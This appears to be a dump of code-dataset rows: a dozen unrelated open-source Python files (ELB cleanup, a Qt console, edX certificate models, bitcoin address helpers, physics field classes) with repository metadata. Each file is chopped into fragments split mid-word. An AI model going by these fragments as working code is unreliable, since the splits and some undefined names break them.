deletion of any load balancers.
:example:
.. code-block:: yaml
policies:
- name: elb-delete-unused
resource: elb
filters:
- Instances: []
actions:
- delete
"""
schema = type_schema('delete')
permissions = ('elasticloadbalancing:DeleteLoadBalancer',)
def process(self, load_balancers):
with self.executor_factory(max_workers=2) as w:
list(w.map(self.process_elb, load_balancers))
def process_elb(self, elb):
client = local_session(self.manager.session_factory).client('elb')
self.manager.retry(
client.delete_load_balancer,
LoadBalancerName=elb['LoadBalancerName'])
@actions.register('set-ssl-listener-policy')
class SetSslListenerPolicy(BaseAction):
"""Action to set the ELB SSL l
|
Katsuya-Ishiyama/simulation
|
strategy/strategy.py
|
Python
|
mit
| 2,013
| 0.00149
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 27 18:31:59 2017
@author: katsuya.ishiyama
"""
from numpy import random
# Definition of module level constants
SUCCESS_CODE = 1
FAILURE_CODE = 0
class Strategy():
def __init__(self, n):
_success_probability = _generate_success_probability(n)
_strategy = {i: p for i, p in enumerate(_success_probability, 1)}
self._n = n
self.strategy = _strategy
self.stock_of_strategy = list(_strategy.keys())
self.tried_strategy = []
self.current_strategy = None
self.previous_strategy = None
self.count_same_strategy = 0
self._result_of_trial = None
def choose_strategy(self):
if not self.stock_of_strategy:
raise ValueError('There is no strategy in stock.')
_chosen_id = random.choice(self.stock_of_strategy, 1)[0]
self.previous_strategy = self.current_strategy
self.current_strategy = _chosen_id
self.count_same_strategy = 0
self.stock_of_strategy.remove(_chosen_id)
_chosen_strategy = {
'chosen_strategy': _chosen_id,
'success_probability': self._get_success_probability()
}
return _chosen_strategy
def _get_success_probability(self):
return self.strategy[self.current_strategy]
def try_strategy(self):
if not self.current_strategy:
raise ValueError('No strategy is chosen.')
self.tried_strategy.append(self.current_strategy)
self._result_of_trial = _get_trial_result(
p=self._get_success_probability()
)
if self.current_strategy == self.previous_strategy:
self.count_same_strategy += 1
ret
|
urn self._result_of_trial
def _get_trial_result(p):
_trial_result = random.choice([FAILURE_CODE, SUCCESS_CODE], size=1, p=[1 - p, p])
return _trial_result[0]
def _generate_suc
|
cess_probability(size):
return random.sample(size)
|
luoxufeiyan/python
|
burness/0013/get_photos.py
|
Python
|
mit
| 1,039
| 0.043095
|
import urllib2
from HTMLParser import HTMLParser
from traceback import print_exc
from sys import stderr
class _DeHTMLParser(HTMLParser):
'''
利用HTMLParse来解析网页元素
'''
def __init__(self):
HTMLParser.__init__(self)
self.img_links = []
def handle_starttag(self, tag, attrs):
if tag == 'img':
# print(attrs)
try:
if ('pic_type','0') in attrs:
for name, value in attrs:
if name == 'src':
self.img_links.append(value)
except Exception as e:
print(e)
return self.img_links
def dehtml(text):
try:
parser = _DeHTMLParser()
parser.feed(text)
parser.close()
return parser.img_links
except:
print_exc(fi
|
le=stderr)
return text
def main():
html = urllib2.urlopen('http://tieba.baidu.com/p/2166231880')
content = html.read()
print(dehtml(content))
i = 0
for img_list in dehtml(content):
img_content = urllib2.urlopen(im
|
g_list).read()
path_name = str(i)+'.jpg'
with open(path_name,'wb') as f:
f.write(img_content)
i+=1
if __name__ == '__main__':
main()
|
jepio/pers_engine
|
persengine.py
|
Python
|
gpl-2.0
| 733
| 0.002729
|
#!/usr/bin/env python2
""" This is the main module, used to launch the persistency engine """
#from persio import iohandler
import persui.persinterface as ui
def main():
""" Launches the user interface, and keeps it on."""
interface = ui.Persinterface()
while True:
interface.run()
if __name__ == '__main__':
main()
"""
def main_old():
keynames = ["A", "B"]
graph_data1 = [(0, 0, 0, 1), (0, 1, 2, 3)]
graph_data2 = [(2, 3, 0,
|
1), (0, 6, 2, 8)]
graph_data = [graph_data1, graph_data2]
name = "tree.xml"
root = iohandler.xh.createindex(keynames)
for i in xrange(2):
iohandler.xh.creategraph(root, graph_data[i], keynames[i], 2)
iohandler.xh.wr
|
itexml(root, name)
"""
|
hakonsbm/nest-simulator
|
pynest/nest/tests/test_sp/test_get_sp_status.py
|
Python
|
gpl-2.0
| 3,006
| 0
|
# -*- coding: utf-8 -*-
#
# test_get_sp_status.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Structural Plasticity GetStatus Test
-----------------------
This tests the functionality of the GetStructuralPlasticityStatus
function
"""
import nest
import unittest
__author__ = 'sdiaz'
class TestGetStructuralPlasticityStatus(unittest.TestCase):
neuron_model = 'iaf_psc_alpha'
nest.CopyModel('static_synapse', 'synapse_ex')
nest.SetDefaults('synapse_ex', {'weight': 1.0, 'delay': 1.0})
nest.SetStructuralPlasticityStatus({
'structural_plasticity_synapses': {
'synapse_ex': {
'model': 'synapse_ex',
'post_synaptic_element': 'Den_ex',
'pre_synaptic_element': 'Axon_ex',
},
}
})
growth_curve = {
'growth_curve': "gaussian",
'growth_rate': 0.0001, # (elements/ms)
'continuous': False,
'eta': 0.0, # Ca2+
'eps': 0.05
}
'''
Now we assign the growth curves to the corresponding synaptic
elements
'''
synaptic_elements = {
'Den_ex': growth_curve,
'Den_in': growth_curve,
'Axon_ex': growth_cur
|
ve,
}
nodes = nest.Create(neuron_model,
2,
{'synaptic_elements': synaptic_elements}
)
all = nest.GetStructuralPlasticityStatus()
print(all)
assert ('structural_plasticity_synapses' in all)
assert ('syn1' in all['structural_plasticity_synapses'])
assert ('structural_plasticity_update_interval' in all)
assert (all['structural_plasticity_update_in
|
terval'] == 1000)
sp_synapses = nest.GetStructuralPlasticityStatus(
'structural_plasticity_synapses'
)
print(sp_synapses)
syn = sp_synapses['syn1']
assert ('pre_synaptic_element' in syn)
assert ('post_synaptic_element' in syn)
assert (syn['pre_synaptic_element'] == 'Axon_ex')
assert (syn['post_synaptic_element'] == 'Den_ex')
sp_interval = nest.GetStructuralPlasticityStatus(
'structural_plasticity_update_interval'
)
print(sp_interval)
assert (sp_interval == 1000)
def suite():
test_suite = unittest.makeSuite(
TestGetStructuralPlasticityStatus,
'test'
)
return test_suite
if __name__ == '__main__':
unittest.main()
|
n2o/dpb
|
dpb/apps.py
|
Python
|
mit
| 108
| 0
|
from filer.apps import FilerConfig
class MyFi
|
lerConfig(F
|
ilerConfig):
verbose_name = "Dateiverwaltung"
|
akehrer/fiddle
|
fiddle/controllers/PyConsole.py
|
Python
|
gpl-3.0
| 5,579
| 0.001255
|
# Copyright (c) 2015 Aaron Kehrer
# Licensed under the terms of the MIT License
# (see fiddle/__init__.py for details)
import os
import unicodedata
from io import StringIO
from PyQt4 import QtCore, QtGui
from fiddle.config import EDITOR_FONT, EDITOR_FONT_SIZE
class PyConsoleTextBrowser(QtGui.QTextBrowser):
def __init__(self, parent=None, process=None):
super(PyConsoleTextBrowser, self).__init__(parent)
self.process = process
# The start position in the QTextBrowser document where new user input will be inserted
self._input_insert_pos = -1
self.history = []
self.history_idx = 0
self.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.setAcceptRichText(False)
self.setReadOnly(False)
self.setOpenExternalLinks(False)
self.setOpenLinks(False)
self.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse | QtC
|
ore.Qt.TextEditorInteraction)
def keyPressEvent(self, event):
|
if self.process is not None:
# Skip keys modified with Ctrl or Alt
if event.modifiers() != QtCore.Qt.ControlModifier and event.modifiers() != QtCore.Qt.AltModifier:
# Get the insert cursor and make sure it's at the end of the console
cursor = self.textCursor()
cursor.movePosition(QtGui.QTextCursor.End)
if self._input_insert_pos < 0:
self._input_insert_pos = cursor.position()
# Scroll view to end of console
self.setTextCursor(cursor)
self.ensureCursorVisible()
# Process the key event
if event.key() == QtCore.Qt.Key_Up:
# Clear any previous input
self._clear_insert_line(cursor)
# Get the history
if len(self.history) > 0:
self.history_idx -= 1
try:
cursor.insertText(self.history[self.history_idx])
except IndexError:
self.history_idx += 1
cursor.insertText('')
elif event.key() == QtCore.Qt.Key_Down:
# Clear any previous input
self._clear_insert_line(cursor)
# Get the history
if len(self.history) > 0 >= self.history_idx:
self.history_idx += 1
try:
cursor.insertText(self.history[self.history_idx])
except IndexError:
self.history_idx -= 1
cursor.insertText('')
elif event.key() == QtCore.Qt.Key_Return:
txt = self._select_insert_line(cursor)
self.process.write('{0}\n'.format(txt).encode('utf-8'))
# Reset the insert position
self._input_insert_pos = -1
# Update the history
self.history.append(txt)
self.history_idx = 0
# Pass the event on to the parent for handling
return QtGui.QTextBrowser.keyPressEvent(self, event)
def _clear_insert_line(self, cursor):
"""
Remove all the displayed text from the input insert line and clear the input buffer
"""
cursor.setPosition(self._input_insert_pos, QtGui.QTextCursor.KeepAnchor)
cursor.removeSelectedText()
def _select_insert_line(self, cursor):
cursor.setPosition(self._input_insert_pos, QtGui.QTextCursor.KeepAnchor)
txt = cursor.selectedText()
cursor.clearSelection()
return txt
class PyConsoleLineEdit(QtGui.QLineEdit):
"""
https://wiki.python.org/moin/PyQt/Adding%20tab-completion%20to%20a%20QLineEdit
http://www.saltycrane.com/blog/2008/01/how-to-capture-tab-key-press-event-with/
"""
def __init__(self):
super(PyConsoleLineEdit, self).__init__()
line_font = QtGui.QFont()
line_font.setFamily(EDITOR_FONT)
line_font.setPointSize(EDITOR_FONT_SIZE)
self.setFont(line_font)
self.history = []
self.history_idx = -1
def event(self, event):
if event.type() == QtCore.QEvent.KeyPress:
if event.key() == QtCore.Qt.Key_Tab:
if self.text().strip() == '':
self.setText(self.text() + ' ')
return True
elif event.key() == QtCore.Qt.Key_Up:
if len(self.history) > 0 and self.history_idx > 0:
self.history_idx -= 1
self.setText(self.history[self.history_idx])
return True
elif event.key() == QtCore.Qt.Key_Down:
if 0 < len(self.history) > self.history_idx:
self.history_idx += 1
try:
self.setText(self.history[self.history_idx])
except IndexError:
self.setText('')
return True
elif event.key() == QtCore.Qt.Key_Return:
try:
if self.history[-1] != self.text():
self.history.append(self.text())
except IndexError:
self.history.append(self.text())
self.history_idx = len(self.history)
return QtGui.QLineEdit.event(self, event)
return QtGui.QLineEdit.event(self, event)
|
alex/solum
|
solum/openstack/common/db/sqlalchemy/models.py
|
Python
|
apache-2.0
| 3,969
| 0
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012 Cloudscaling Group, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models.
"""
import six
from sqlalchemy import Column, Integer
from sqlalchemy import DateTime
from sqlalchemy.orm import object_mapper
from solum.openstack.common.db.sqlalchemy import session as sa
from solum.openstack.common import timeutils
class ModelBase(object):
"""Base class for models."""
__table_initialized__ = False
def save(self, session=None):
"""Save this object."""
if not session:
session = sa.get_session()
# NOTE(boris-42): This part of code should be look like:
# session.add(self)
# session.flush()
# But there is a bug in sqlalchemy and eventlet that
# raises NoneType exception if there is no running
# transaction and rollback is called. As long as
# sqlalchemy has this bug we have to create transaction
# explicitly.
with session.begin(subtransactions=True):
se
|
ssion.add(self)
session.flush()
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def get(self, key, default=None):
return getattr(self, key, default)
@property
def _extra_keys(self):
|
"""Specifies custom fields
Subclasses can override this property to return a list
of custom fields that should be included in their dict
representation.
For reference check tests/db/sqlalchemy/test_models.py
"""
return []
def __iter__(self):
columns = dict(object_mapper(self).columns).keys()
# NOTE(russellb): Allow models to specify other keys that can be looked
# up, beyond the actual db columns. An example would be the 'name'
# property for an Instance.
columns.extend(self._extra_keys)
self._i = iter(columns)
return self
def next(self):
n = six.advance_iterator(self._i)
return n, getattr(self, n)
def update(self, values):
"""Make the model object behave like a dict."""
for k, v in six.iteritems(values):
setattr(self, k, v)
def iteritems(self):
"""Make the model object behave like a dict.
Includes attributes from joins.
"""
local = dict(self)
joined = dict([(k, v) for k, v in six.iteritems(self.__dict__)
if not k[0] == '_'])
local.update(joined)
return six.iteritems(local)
class TimestampMixin(object):
created_at = Column(DateTime, default=lambda: timeutils.utcnow())
updated_at = Column(DateTime, onupdate=lambda: timeutils.utcnow())
class SoftDeleteMixin(object):
deleted_at = Column(DateTime)
deleted = Column(Integer, default=0)
def soft_delete(self, session=None):
"""Mark this object as deleted."""
self.deleted = self.id
self.deleted_at = timeutils.utcnow()
self.save(session=session)
|
davidam/python-examples
|
bokeh/openstreetmap.py
|
Python
|
gpl-3.0
| 1,245
| 0
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2018 David Arroyo Menéndez
# Author: David Arroyo Menéndez <[email protected]>
# Maintainer: David Arroyo Menéndez <[email protected]>
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
# This file is distributed
|
in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with GNU Emacs; see the file COPYING. If not, write to
# the Free
|
Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA,
from bokeh.plotting import figure, show, output_file
from bokeh.tile_providers import CARTODBPOSITRON
output_file("tile.html")
# range bounds supplied in web mercator coordinates
p = figure(x_range=(-2000000, 6000000), y_range=(-1000000, 7000000),
x_axis_type="mercator", y_axis_type="mercator")
p.add_tile(CARTODBPOSITRON)
show(p)
|
talkincode/toughlogger
|
toughlogger/console/handlers/password_forms.py
|
Python
|
agpl-3.0
| 789
| 0.006784
|
#!/usr/bin/env python
# coding=utf-8
from toughlogger.common import pyforms
from
|
toughlogger.common.pyforms import rules
from toughlogger.com
|
mon.pyforms.rules import button_style, input_style
password_update_form = pyforms.Form(
pyforms.Textbox("tra_user", description=u"管理员名", size=32, readonly="readonly", **input_style),
pyforms.Password("tra_user_pass", rules.len_of(6, 32), description=u"管理员新密码", size=32,value="", required="required", **input_style),
pyforms.Password("tra_user_pass_chk", rules.len_of(6, 32), description=u"确认管理员新密码", size=32,value="", required="required", **input_style),
pyforms.Button("submit", type="submit", html=u"<b>更新</b>", **button_style),
title=u"管理密码更新",
action="/password"
)
|
jazkarta/edx-platform-for-isc
|
lms/djangoapps/certificates/models.py
|
Python
|
agpl-3.0
| 17,158
| 0.000816
|
# -*- coding: utf-8 -*-
"""
Certificates are created for a student and an offering of a course.
When a certificate is generated, a unique ID is generated so that
the certificate can be verified later. The ID is a UUID4, so that
it can't be easily guessed and so that it is unique.
Certificates are generated in batches by a cron job, when a
certificate is available for download the GeneratedCertificate
table is updated with information that will be displayed
on the course overview page.
State diagram:
[deleted,error,unavailable] [error,downloadable]
+ + +
| | |
| | |
add_cert regen_cert del_cert
| | |
v v v
[generating] [regenerating] [deleting]
+ + +
| | |
certificate certificate certificate
created removed,created deleted
+----------------+-------------+------->[error]
| | |
| | |
v v v
[downloadable] [downloadable] [deleted]
Eligibility:
Students are eligible for a certificate if they pass the course
with the following exceptions:
If the student has allow_certificate set to False in the student profile
he will never be issued a certificate.
If the user and course is present in the certificate whitelist table
then the student will be issued a certificate regardless of his grade,
unless he has allow_certificate set to False.
"""
from datetime import datetime
import uuid
from django.contrib.auth.models import User
from django.db import models, transaction
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.conf import settings
from django.utils.translation import ugettext_lazy
from model_utils import Choices
from model_utils.models import TimeStampedModel
from config_models.models import ConfigurationModel
from xmodule_django.models import CourseKeyField, NoneToEmptyManager
from util.milestones_helpers import fulfill_course_milestone
from course_modes.models import CourseMode
class CertificateStatuses(object):
deleted = 'deleted'
deleting = 'deleting'
downloadable = 'downloadable'
error = 'error'
generating = 'generating'
notpassing = 'notpassing'
regenerating = 'regenerating'
restricted = 'restricted'
unavailable = 'unavailable'
class CertificateWhitelist(models.Model):
"""
Tracks students who are whitelisted, all users
in this table will always qualify for a certificate
regardless of their grade unless they are on the
embargoed country restriction list
(allow_certificate set to False in userprofile).
"""
objects = NoneToEmptyManager()
user = models.ForeignKey(User)
course_id = CourseKeyField(max_length=255, blank=True, default=None)
whitelist = models.BooleanField(default=0)
class GeneratedCertificate(models.Model):
MODES = Choices('verified', 'honor', 'audit')
user = models.ForeignKey(User)
course_id = CourseKeyField(max_length=255, blank=True, default=None)
verify_uuid = models.CharField(max_length=32, blank=True, default='')
download_uuid = models.CharField(max_length=32, blank=True, default='')
download_url = models.CharField(max_length=128, blank=True, default='')
grade = models.CharField(max_length=5, blank=True, default='')
key = models.CharField(max_length=32, blank=True, default='')
distinction = models.BooleanField(default=False)
status = models.CharField(max_length=32, default='unavailable')
mode = models.CharField(max_length=32, choices=MODES, default=MODES.honor)
name = models.CharField(blank=True, max_length=255)
created_date = models.DateTimeField(
auto_now_add=True, default=datetime.now)
modified_date = models.DateTimeField(
auto_now=True, default=datetime.now)
error_reason = models.CharField(max_length=512, blank=True, default='')
class Meta:
unique_together = (('user', 'course_id'),)
@classmethod
def certificate_for_student(cls, student, course_id):
"""
This returns the certificate for a student for a particular course
or None if no such certificate exits.
"""
try:
return cls.objects.get(user=student, course_id=course_id)
except cls.DoesNotExist:
pass
return None
@receiver(post_save, sender=GeneratedCertificate)
def handle_post_cert_generated(sender, instance, **kwargs): # pylint: disable=no-self-argument, unused-argument
"""
Handles post_save signal of GeneratedCertificate, and mark user collected
course milestone entry if user has passed the course
or certificate status is 'generating'.
"""
if settings.FEATURES.get('ENABLE_PREREQUISITE_COURSES') and instance.status == CertificateStatuses.generating:
fulfill_course_milestone(instance.course_id, instance.user)
def certificate_status_for_student(student, course_id):
'''
This returns a dictionary with a key for status, and other information.
The status is one of the following:
unavailable - No entry for this student--if they are actually in
the course, they probably have not been graded for
certificate generation yet.
generating - A request has been made to generate a certificate,
but it has not been generated yet.
regenerating - A request has been made to regenerate a certificate,
but it has not been generated yet.
deleting - A request has been made to delete a certificate.
deleted - The certificate has been deleted.
downloadable - The certificate is available for download.
notpassing - The student was graded but is not passing
restricted - The student is on the restricted embargo list and
should not be issued a certificate. This will
be set if allow_certificate is set to False in
the userprofile table
If the status is "downloadable", the dictionary also contains
"download_url".
If the student has been graded, the dictionary also contains their
grade for the course with the key "grade".
'''
try:
generated_certificate = GeneratedCertificate.objects.get(
user=student, course_id=course_id)
d = {'status': generated_certificate.status,
'mode': generated_certificate.mode}
if generated_certificate.grade:
d['grade'] = generated_certificate.grade
if generated_certificate.status == CertificateStatuses.downloadable:
d['download_url'] = generated_certificate.download_url
return d
except GeneratedCertificate.DoesNotExist:
pass
return {'status': CertificateStatuses.unavailable, 'mode': GeneratedCertificate.MODES.honor}
|
class ExampleCertificateSet(TimeStampedModel):
"""A set of example certificates.
Example certificates are used to verify that certificate
generation is working for a particular course.
A particular course may have several kinds of certificates
(e.g. honor and verified), in which case we generate
multiple ex
|
ample certificates for the course.
"""
course_key = CourseKeyField(max_length=255, db_index=True)
class Meta: # pylint: disable=missing-docstring, old-style-class
get_latest_by = 'created'
@classmethod
@transaction.commit_on_success
def create_example_set(cls, course_key):
"""Create a set of example certificates for a course.
Arguments:
course_key (CourseKey)
Returns:
ExampleCertificateSet
"""
cert_set = cls.objects.create(course_key=course_key)
ExampleCertificate.objects.bulk_create([
ExampleCertificate(
exa
|
obulpathi/reversecoin
|
reversecoin/bitcoin/utils.py
|
Python
|
gpl-2.0
| 4,697
| 0.004897
|
#!/usr/bin/env python
import binascii
import hashlib
from reversecoin.bitcoin.key import CKey as Key
from reversecoin.bitcoin.base58 import encode, decode
def myhash(s):
return hashlib.sha256(hashlib.sha256(s).digest()).digest()
def myhash160(s):
h = hashlib.new('ripemd160')
h.update(hashlib.sha256(s).digest())
return h.digest()
def getnewaddress():
# Generate public and private keys
key = Key()
key.generate()
key.set_compressed(True)
private_key = key.get_privkey()
public_key = key.get_pubkey()
private_key_hex = private_key.encode('hex')
public_key_hex = public_key.encode('hex')
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
# Convert the result from a byte string into a base58 string using Base58Check encoding.
address = encode(binary_address)
return public_key, private_key, address
def public_key_to_address(public_key):
public_key_hex = public_key.encode('hex')
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
address = encode(binary_address)
return address
def public_key_hex_to_address(public_key_hex):
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
address = encode(binary_address)
return address
# fix this
def address_to_public_key_hash(address):
binary_address = decode(address)
# remove the 4 checksum bytes
extended_address = binary_address[:-4]
# remo
|
ve version byte: 0x00 for Main Netwo
|
rk
hash160_address = extended_address[1:]
return hash160_address
def public_key_hex_to_pay_to_script_hash(public_key_hex):
script = "41" + public_key_hex + "AC"
return binascii.unhexlify(script)
def address_to_pay_to_pubkey_hash(address):
print "Not implemented >>>>>>>>>>>>>>>>>>>"
exit(0)
def output_script_to_public_key_hash(script):
script_key_hash = binascii.hexlify(myhash160(bytearray.fromhex(binascii.hexlify(script[1:-1]))))
return script_key_hash
def address_to_output_script(address):
pass
if __name__ == "__main__":
address1 = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM"
address2 = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
public_key_hex1 = "0450863AD64A87AE8A2FE83C1AF1A8403CB53F53E486D8511DAD8A04887E5B23522CD470243453A299FA9E77237716103ABC11A1DF38855ED6F2EE187E9C582BA6"
public_key_hex2 = "04678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5f"
print "address: ", address1
print "public key_hex: ", public_key_hex1
#print "public_keys_hex: ", public_key_hex1, public_key_hex2
print "public key to address: ", public_key_hex_to_address(public_key_hex1)
print "address to public key hash: ", binascii.hexlify(address_to_public_key_hash(address1))
# print "public key hash: ", binascii.hexlify(myhash160(bytearray.fromhex(public_key_hex1)))
|
jon2718/ipycool_2.0
|
edge.py
|
Python
|
mit
| 4,743
| 0.002321
|
from pseudoregion import *
class Edge(PseudoRegion):
"""EDGE Fringe field and other kicks for hard-edged field models
1) edge type (A4) {SOL, DIP, HDIP, DIP3, QUAD, SQUA, SEX, BSOL, FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by factor 1/(1+delta)
p4: if not 0 ==> apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole (DIP), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg's HRDEND routine to find the change in transverse
position and transverse momentum due to the fringe field.
"""
def __init__(
self,
edge_type,
model,
model_parameters_list,
name=None,
metadata=None):
PseudoRegion.__init__(self, name, metadata)
self.edge_type = edge_type
self.model = model
self.model_parameters = model_parameters
class Edge(Field):
"""
EDGE
1) edge type (A4) {SOL, DIP, HDIP,DIP3,QUAD,SQUA,SEX, BSOL,FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by the factor 1 / (1+δ)
p4: if not 0 => apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole ( DIP ), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg’s HRDEND routine to find the change in
transverse position and transverse momentum due to the fringe field.
"""
begtag = 'EDGE'
endtag = ''
models = {
'model_descriptor': {
'desc': 'Name of model parameter descriptor',
'name': 'model',
'num_parms': 6,
'for001_format': {
'line_splits': [
1,
5]}},
'sol
|
': {
'desc': 'Solenoid',
'doc': '',
'icool_model_name': 'SOL',
|
'parms': {
'model': {
'pos': 1,
'type': 'String',
'doc': ''},
'bs': {
'pos': 3,
'type': 'Real',
'doc': 'p1: BS [T] '
'If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the '
'exit edge. (You can use this to get a tapered field profile)'}}},
}
def __init__(self, **kwargs):
Field.__init__(self, 'EDGE', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'EDGE':
object.__setattr__(self, name, value)
else:
# Should raise exception here
print '\n Illegal attempt to set incorrect ftag.\n'
else:
Field.__setattr__(self, name, value)
def __str__(self):
return Field.__str__(self)
def gen_fparm(self):
Field.gen_fparm(self)
|
michaelchu/kaleidoscope
|
kaleidoscope/options/order_leg.py
|
Python
|
mit
| 884
| 0.001131
|
from kaleidoscope.globals import SecType
class OrderLeg(object):
def __init__(self, quantity, contract):
"""
This class is an abstraction of an order leg of an option strategy. It holds the information
for a single order leg as part of an entire option strategy.
"""
self.quantity = q
|
uantity
self.contract = contract
def reverse(self):
""" reverse the the position by negating the quantity """
self.quantity *= -1
class OptionLeg
|
(OrderLeg):
""" Holds information of an option leg """
def __init__(self, option, quantity):
self.sec_type = SecType.OPT
super().__init__(quantity, option)
class StockLeg(OrderLeg):
""" Holds information of an stock leg """
def __init__(self, symbol, quantity):
self.sec_type = SecType.STK
super().__init__(quantity, symbol)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.